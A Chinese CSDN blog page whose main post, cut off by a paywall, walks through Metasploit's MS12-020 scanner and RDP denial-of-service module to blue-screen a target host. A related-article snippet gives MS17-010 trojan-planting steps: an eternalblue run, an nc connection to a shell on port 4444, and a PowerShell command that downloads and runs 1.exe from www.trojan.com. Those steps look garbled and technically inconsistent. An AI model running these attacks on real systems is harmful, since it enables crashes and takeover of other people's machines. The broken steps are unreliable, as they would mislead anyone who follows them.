kali渗透Ms12-020小结笔记

最新推荐文章于 2023-05-16 16:53:16 发布
最新推荐文章于 2023-05-16 16:53:16 发布
阅读量629 收藏 2
点赞数 1
分类专栏: 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42866017/article/details/124909677
版权
本文是作者沧海IV关于kali渗透Ms12-020的经验分享。首先,需确保目标主机3389端口开放。通过msfconsole进入控制台,搜索ms12-020模块,使用auxiliary/scanner/rdp/ms12_020_check扫描目标IP,找到攻击目标10.10.58.53。接着,加载auxiliary/dos/windows/rdp/ms12_020_maxchannelids攻击模块并执行,导致目标蓝屏。学习中发现,必须先用辅助模块扫描,否则攻击会失败。
摘要由CSDN通过智能技术生成

kali渗透Ms12-020小结笔记

作者沧海IV

需要目标主机开放3389端口
第一步输入msfconsole 进入msf控制端
在这里插入图片描述第二步输入search ms12-020 这条指令是搜索ms12-020模块的在这里插入图片描述

第三步我们搜索到ms12-020的俩个模块第一是攻击模块第二是搜索模块,先输入use auxiliary/scanner/rdp/ms12_020_check 运行搜索模块然后show options查看一下这里没有设置目标ip我们先设置个目标IPset RHOSTS 10.10.58.1/24输入run查找
#ms12-202默认搜索端口是3389
在这里插入图片描述
搜索到俩个IP10.10.58.53是本次攻击目标
在这里插入图片描述
然后我们在来输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
来加载攻击模块然后输入set RHOST 10.10.58.53 #设置攻击目标

最低0.47元/天 解锁文章
沧海IV
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Linux_Kali网络渗透测试学习笔记总结】
数据库爆破专家的博客
04-30 2211
【Linux_Kali网络渗透测试学习笔记总结】 声明:笔记总结涉及的所有文章的笔记皆是笔者根据由 Lee Allen, Tedi Heriyanto, Shakeel Ali 写得 《Kali Linux渗透测试的艺术》 一书中的内容进行分析和学习后,摘要重要知识点分解出来的总结,动态配图是我对书中教授的方法进行原模原样的按部就班操作的,为了方便和大家分享一下学习过程中的实况。 笔记总结目...
渗透测试思路总结
weixin_33881050的博客
09-15 2075
一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题。 第一个是在渗透操作系统时,最为关键的从漏洞分析到渗透攻击这一步很难跨越。因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径,漏洞利用只有Metasploit...
kali-蓝屏攻击ms12-020
热门推荐
臭nana的博客
03-02 1万+
打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端 输入search ms12-020,这条指令是搜索ms12-020模块 上面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块 输入useauxiliary/scanner/rdp/ms12_020_check 然...
【Linux_Kali网络渗透测试学习笔记总结(五)】社会工程学攻击
数据库爆破专家的博客
04-29 3254
网络渗透测试(五):社会工程学攻击 社会工程学时利用人性弱点体察,获取有价值信息的实践方法,它是一种欺骗的艺术。在缺少目标系统的必要信息时,社会工程学技术是渗透测试人员获取信息的至关重要的手段。对所有类型的组织(单位)而言,人都是安全防范措施里最薄弱的一环,也是整个安全基础设施最脆弱的层面。 文章目录网络渗透测试(五):社会工程学攻击1.1人类心理学建模1.2 攻击过程1.3 攻击方法1.4 狐假...
Kali进行web渗透笔记(一)
小勇的博客
06-12 1390
Insider attacks are more lethal than the one achieved by an external entity,so sometimes Black box testing would be a waste of money and time . Career as a penetration tester is not a sprint,it is a ma
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
网络攻防实验ms12-020.docx
08-29
网络攻防实验 MS12-020 MS12-020 是一个危险的漏洞,影响了微软 Windows 操作系统的安全。该漏洞使得攻击者可以在victim机器上执行恶意代码,从而获取系统控制权。下面我们将详细介绍 MS12-020 漏洞的原理、危害性...
Kali网络渗透英文词汇-圣经版
11-01
Kali网络渗透英文词汇-圣经版
MS12-020漏洞利用(蓝屏攻击).docx
05-06
MS12-020漏洞,也被称为"DirectShow 漏洞",是微软Windows操作系统中的一个严重安全漏洞,主要影响Windows XP、Windows Server 2003、Windows Vista、Windows Server 2008以及Windows 7等多个版本。这个漏洞出现在...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
Kali Linux渗透测试实训手册
11-08
Kali Linux的渗透测试实训手册,Kali Linux的渗透测试实训手册,
网络安全与网站安全及计算机安全:如何使用Kali Linux的MSF进行MS12-020安全演练
Kali与编程
12-11 1445
一、资源装备 安装好Kali Linux的虚拟机一台; Windows xp 计算机一台。 二、安全演练 2.1 在kali中启动MSF。 打开终端 键入命令:msfconsole 2.2 配置相关参数 ①键入命令:search ms12-020 ②复制msf返回的命令前加use: use auxiliary/dos/windows/rdp/ms12_020_maxchannellid ③显示需要配置的参数 : show options ⑤设置靶机(win xp)IP地址 set rhosts 19
漏洞分析:MS12-020漏洞
liu914589417的博客
04-28 6408
漏洞分析:MS12-020漏洞 实验工具 1、VMware虚拟机 2、Kali 2021 系统虚拟机 3、Windows 7系统虚拟机 1、第一步:在VMware中打开Kali 2021虚拟机和Windows 7虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。 2、确定能连通后,打开MSF攻击框架,Kali 2021【终端】中输入命令【msfconsole】。 3、输入搜索命令,搜索MS12-020漏洞,输入命令【search ms12_020】。 4、引用编号为【1】的漏洞,引用漏洞路径,
kali linux135漏洞,Kali Linux渗透基础知识整理(二):漏洞扫描
weixin_34182361的博客
05-16 1643
漏洞扫描网络流量NmapHping3NessuswhatwebDirBusterjoomscanWPScan网络流量网络流量就是网络上传输的数据量。TCP协议TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答SYN+ACK ,并最终对对方的 SYN 执行 ACK 确认。这种建立连接的方法可以防止产生错误的连接,TCP使用的流量控制协议是可变大小的滑动...
MS12-020 漏洞实验
weixin_34416649的博客
11-20 143
2019独角兽企业重金招聘Python工程师标准>>> ...
Windows系统漏洞MS12-020
Nanyeer的博客
05-16 1540
使用kali和win2003演示Windows系统漏洞MS12-020
MS12_020渗透 蓝屏攻击
最小公倍数的博客
10-27 570
背景 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞; 漏洞影响范围:开了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2...
第7篇:MS12-020蓝屏漏洞在实战中的巧用
ABC_123的博客
04-30 2649
Part1 前言大家好,上期分享了一篇Shiro Oracle Padding反序列化漏洞无key的实战文章,这期讲一个MS12-020蓝屏漏洞的真实利用过程。这个案例源于2013年我在读研期间,印象是比较深的。在学校期间,我偶尔会帮网络部那边处理一些网站故障,还帮忙修补过安全漏洞。在那个年代,大学网站的漏洞是非常多的,基本上没有什么WAF设备防护。期间有一个大学网站.........
kali利用ms17-010挂马
最新发布
12-15
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用该漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤: 1. 打开终端,输入以下命令更新kali系统: ```shell sudo apt-get update sudo apt-get upgrade ``` 2. 下载ms17-010漏洞利用工具,可以从GitHub上下载: ```shell git clone https://github.com/worawit/MS17-010.git ``` 3. 进入MS17-010目录,运行以下命令编译漏洞利用工具: ```shell cd MS17-010 make ``` 4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞: ```shell ./send_and_execute 192.168.1.100 whoami.exe ``` 5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell: ```shell ./eternalblue 192.168.1.100 shellcode.bin ``` 6. 执行以下命令,连接目标主机的Shell: ```shell nc 192.168.1.100 4444 ``` 7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序: ```shell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'" ``` 需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值